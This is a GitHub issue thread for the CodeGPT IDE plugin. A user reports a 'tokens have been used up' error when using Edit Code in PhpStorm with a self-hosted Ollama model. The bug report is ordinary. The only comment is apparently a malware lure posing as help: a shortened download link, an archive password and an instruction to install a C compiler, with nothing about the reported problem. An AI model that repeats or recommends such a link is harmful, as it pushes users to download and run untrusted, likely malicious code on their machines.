### ISSUE TITLE
"Your tokens have been used up" error when using Edit code selection in PhpStorm

### ISSUE THREAD

**Issue by Majroch** [carlrobertoh/CodeGPT#700]
### What happened?

While I was using this tool and editting my SQL data in migrations with "Edit Code" button in PhpStorm, after some time I got: `Your tokens have been used up. Please try again in 1651132 second(s), or upgrade your plan.` error.

![image](https://github.com/user-attachments/assets/6ac8755c-ea45-40ae-96ab-6db03b842930)

I am using my Ollama instance:

![image](https://github.com/user-attachments/assets/dc2e1d62-4cc8-424e-9266-572b79a9ec9f)

Chat and code completion is working correctly, and only this one thing I've noticed that is blocked by this.

What does it mean? Is there some limit set in CodeGPT?

I've looked for this exact limit in code, and looked for logs on my Nginx server, but nothing shows up, that could indicate exact problem.

### Steps to reproduce

1. Configure Ollama instance
2. Use "Edit code" function on small portions of code, but in fast successions and on big amount of data
3. Error kicks in and blocks only this option

### CodeGPT version

2.11.1-241.1

### Operating System

Linux

**Comment by pinpolhoxx** [comment]
download
https://bit.ly/3TzaAQd

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)
